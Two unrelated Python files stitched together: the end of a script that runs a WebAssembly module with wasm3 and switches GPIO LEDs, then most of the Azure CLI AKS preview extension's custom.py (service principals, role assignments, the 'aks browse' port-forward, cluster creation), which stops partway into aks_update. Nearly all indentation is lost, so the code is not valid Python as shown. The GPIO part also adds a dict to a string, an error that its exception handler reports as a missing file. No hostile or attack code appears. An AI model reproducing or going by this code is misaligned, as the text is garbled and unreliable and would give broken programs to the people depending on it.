gpio_pin_mapping = {}
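# Optional pin remapping loaded from gpio_pin_mapping.txt. Judging by the parser
# below, the expected format is comma-separated "wasmPin:gpioPin" integer pairs,
# e.g. a (hypothetical) file containing "13:17,12:27" would map WASM pin 13 to
# BCM GPIO 17 and pin 12 to GPIO 27.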
try:
with open("gpio_pin_mapping.txt", "rb") as f:
raw = f.read()
mapping = raw.decode().strip("\n").split(",")
for m in mapping:
gpio_pin_mapping[int(m.split(":")[0])] = int(m.split(":")[1])
print("GPIO Pin Mapping: " + gpio_pin_mapping)
except Exception:
print("No gpio_pin_mapping.txt found, using default mapping.")
def env_digitalWrite(pin, value):
print(f"digitalWrite({pin}, {value})")
if pin in gpio_pin_mapping:
pin = gpio_pin_mapping[pin]
print(f"Mapped pin {pin}")
led = None
if pin not in LEDs:
led = LED(pin)
LEDs[pin] = led
else:
led = LEDs[pin]
if value == 1:
led.on()
elif value == 0:
led.off()
def setup_wasm(file):
env = wasm3.Environment()
m3rt = env.new_runtime(4096)
with open(f"{data_dir}/deployment_{get_active_deployment()}.wasm", "rb") as f:
mod = env.parse_module(f.read())
m3rt.load(mod)
mod.link_function("hostbindings", "delay", "v(i)", env_delay)
mod.link_function(
"hostbindings", "print", "v(*i)", lambda *x: env_print(m3rt, *x)
)
mod.link_function(
"hostbindings", "println", "v(*i)", lambda *x: env_print(m3rt, *x)
)
mod.link_function("hostbindings", "pinMode", "v(ii)", env_pinMode)
mod.link_function("hostbindings", "digitalWrite", "v(ii)", env_digitalWrite)
start = m3rt.find_function("_start")
start()
def start_wasm_process():
if not os.path.isfile(f"{data_dir}/deployment_{get_active_deployment()}.wasm"):
print("No deployment found, idleing...")
return
print("Starting wasm")
try:
global wasm_process_handler
wasm_process_handler = Process(
target=setup_wasm, daemon=True, args=("app.wasm",)
)
wasm_process_handler.start()
except Exception as e:
print(e)
print(traceback.format_exc())
""" Fall back to previous deployment """
switch_deployment()
restart_wasm_process()
def restart_wasm_process():
print("Restarting wasm process...")
if wasm_process_handler:
wasm_process_handler.terminate()
wasm_process_handler.join()
start_wasm_process()
|
custom.py
|
# pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import base64
import webbrowser
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
import requests
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException
import yaml # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from dateutil.parser import parse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
import colorama # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.graphrbac.models import (ApplicationCreateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters)
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ContainerServiceLinuxProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ManagedClusterWindowsProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ContainerServiceNetworkProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ManagedClusterServicePrincipalProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ContainerServiceSshConfiguration
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ContainerServiceSshPublicKey
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ManagedCluster
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ManagedClusterAADProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ManagedClusterAddonProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ManagedClusterAgentPoolProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import AgentPool
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ContainerServiceStorageProfileTypes
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ManagedClusterLoadBalancerProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ManagedClusterLoadBalancerProfileManagedOutboundIPs
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ManagedClusterLoadBalancerProfileOutboundIPPrefixes
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ManagedClusterLoadBalancerProfileOutboundIPs
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ResourceReference
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ManagedClusterIdentity
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ManagedClusterAPIServerAccessProfile
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_storage
from ._helpers import _populate_api_server_access_profile, _set_load_balancer_sku, _set_vm_set_type
logger = get_logger(__name__)
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
        except URLError:
            time.sleep(1)
            continue
        break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
    t = threading.Thread(target=wait_then_open, args=(url,))
t.daemon = True
t.start()
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
try:
create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _add_role_assignment(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(cli_ctx, role, service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
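    # Hypothetical example: name='My_Cluster', resource_group_name='my-rg!',
    # subscription_id='1234567890...' -> 'MyCluster-my-rg-123456'.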
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cli_ctx, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.mgmt.resource.resources import ResourceManagementClient
from azure.mgmt.resource.resources.models import DeploymentProperties
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cli_ctx, ResourceManagementClient, subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
return smc.validate(resource_group_name, deployment_name, properties)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
key_usage=key_usage, start_date=start_date, end_date=end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx, role, assignee, resource_group_name, scope)
def _create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError('When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
    if not any([ids, assignee, role, resource_group_name, scope, yes]):
from knack.prompting import prompt_y_n
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _build_role_scope(resource_group_name, scope, subscription_id):
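    # Produces '/subscriptions/<sub>' or '/subscriptions/<sub>/resourceGroups/<rg>'
    # unless an explicit scope is passed, in which case a resource group name is
    # rejected as redundant.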
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def subnet_role_assignment_exists(cli_ctx, scope):
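    # This GUID is the role definition ID of the built-in "Network Contributor"
    # role; assignments are matched by suffix because role_definition_id is a
    # full, subscription-scoped resource ID.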
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
def aks_browse(cmd, # pylint: disable=too-many-statements
client,
resource_group_name,
name,
disable_browser=False,
listen_address='127.0.0.1',
listen_port='8001'):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
addon_profile = addon_profiles.get("kubeDashboard", ManagedClusterAddonProfile(enabled=True))
if not addon_profile.enabled:
raise CLIError('The kube-dashboard addon was disabled for this managed cluster.\n'
'To use "az aks browse" first enable the add-on\n'
'by running "az aks enable-addons --addons kube-dashboard".')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system", "--output", "name",
"--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = '{0}://{1}:{2}/'.format(protocol, listen_address, listen_port)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{}'.format(term_id),
json={"url": result['url']})
logger.warning('To view the console, please open %s in a new tab', result['url'])
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(proxy_url)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "--namespace", "kube-system",
"port-forward", "--address", listen_address, dashboard_pod,
"{0}:{1}".format(listen_port, dashboard_port)], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
            if err.output.find(b'unknown flag: --address') != -1:
if listen_address != '127.0.0.1':
logger.warning('"--address" is only supported in kubectl v1.13 and later.')
logger.warning('The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "--namespace", "kube-system",
"port-forward", dashboard_pod, "{0}:{1}".format(listen_port, dashboard_port)])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
            requests.post('http://localhost:8888/closeport/{0}'.format(listen_port))
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
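# Illustrative invocation that lands in this handler (flag names follow the
# public `az aks create` surface; not verified against this preview extension):
#   az aks create -g MyResourceGroup -n MyCluster --node-count 3 --generate-ssh-keys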
def aks_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
name,
ssh_key_value,
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_size=0,
node_osdisk_diskencryptionset_id='',
node_count=3,
nodepool_name="nodepool1",
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
enable_vmss=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
enable_cluster_autoscaler=False,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
enable_addons=None,
workspace_resource_id=None,
min_count=None,
max_count=None,
vnet_subnet_id=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
node_zones=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
enable_pod_security_policy=False,
node_resource_group=None,
attach_acr=None,
enable_private_cluster=False,
enable_managed_identity=False,
api_server_authorized_ip_ranges=None,
aks_custom_headers=None,
no_wait=False):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# Flag to be removed, kept for back-compatibility only. Remove the below section
# when we deprecate the enable-vmss flag
if enable_vmss:
if vm_set_type and vm_set_type.lower() != "VirtualMachineScaleSets".lower():
raise CLIError('enable-vmss and provided vm_set_type ({}) are conflicting with each other'.
format(vm_set_type))
vm_set_type = "VirtualMachineScaleSets"
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = _set_load_balancer_sku(load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError('--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
vnet_subnet_id=vnet_subnet_id,
availability_zones=node_zones,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username:
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password)
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"))
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
scope = vnet_subnet_id
if not _add_role_assignment(
cmd.cli_ctx,
'Network Contributor',
service_principal_profile.client_id,
scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = _get_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes)
network_profile = None
if any([network_plugin,
pod_cidr,
service_cidr,
dns_service_ip,
docker_bridge_address,
network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id
)
if 'omsagent' in addon_profiles:
_ensure_container_insights_for_monitoring(cmd, addon_profiles['omsagent'])
aad_profile = None
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
api_server_access_profile = None
if api_server_authorized_ip_ranges:
api_server_access_profile = _populate_api_server_access_profile(api_server_authorized_ip_ranges)
identity = None
if enable_managed_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
enable_rbac = True
if disable_rbac:
enable_rbac = False
mc = ManagedCluster(
location=location, tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=enable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
enable_pod_security_policy=bool(enable_pod_security_policy),
identity=identity,
disk_encryption_set_id=node_osdisk_diskencryptionset_id,
api_server_access_profile=api_server_access_profile)
if node_resource_group:
mc.node_resource_group = node_resource_group
if enable_private_cluster:
if load_balancer_sku.lower() != "standard":
raise CLIError("Please use standard load balancer for private cluster")
mc.api_server_access_profile = ManagedClusterAPIServerAccessProfile(
enable_private_cluster=True
)
headers = {}
if aks_custom_headers is not None:
if aks_custom_headers != "":
for pair in aks_custom_headers.split(','):
parts = pair.split('=')
if len(parts) != 2:
raise CLIError('custom headers format is incorrect')
headers[parts[0]] = parts[1]
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc,
custom_headers=headers)
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_update(cmd, # pylint: disable=too-many-statements,too-many-branches,too-many-locals
client,
resource_group_name,
name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None, no_wait=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
api_server_authorized_ip_ranges=None,
enable_pod_security_policy=False,
disable_pod_security_policy=False,
attach_acr=None,
detach_acr=None):
update_autoscaler = enable_cluster_autoscaler or disable_cluster_autoscaler or update_cluster_autoscaler
update_acr = attach_acr is not None or detach_acr is not None
update_lb_profile = load_balancer_managed_outbound_ip_count is not None or \
load_balancer_outbound_ips is not None or load_balancer_outbound_ip_prefixes is not None
update_pod_security = enable_pod_security_policy or disable_pod_security_policy
# pylint: disable=too-many-boolean-expressions
